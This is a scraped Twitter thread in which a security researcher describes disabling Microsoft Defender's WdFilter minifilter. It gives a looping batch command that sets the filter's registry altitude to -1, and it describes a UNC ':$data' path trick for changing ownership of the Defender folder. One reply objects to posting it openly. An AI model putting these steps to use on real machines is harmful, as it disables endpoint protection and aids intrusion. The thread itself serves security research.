Some people tell me it autoreloads when unloaded- if that happens just use this bat while unloading: :again reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance" /v altitude /t REG_SZ /d -1 /f goto again
-
-
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Could you rot13 that kind of dangerous thing? Some people would be "hey lemme try dat!" I do the kill -9 -1 joke but no one who can use a *nix command line would run that. Then again curl
$thing | bash is all over the place... -
yarh- sorry, my target audience knows what they are doing. Besides- defender filters that registry key, that why i start by unloading it. So the cmd alone do nothing.......
- Show replies
New conversation -
-
-
By setting the altitude to -1 we stop it from attaching to any volumes:pic.twitter.com/S8vUmMa3Ai
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
interesting
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Also generic bypass of file "freeze" by minifilters: When you open UNC path if it ends with :$data - that is ignored when doing the open. This can create a mismatch between what is opened and what the filter sees.
Show this thread -
this allows setting another owner and security for defender folder because of thatpic.twitter.com/imITCIM24u
Show this thread
End of conversation
New conversation -
-
-
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
some tips to become like u... security research
-
forget everything about having a social life/family
- Show replies
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.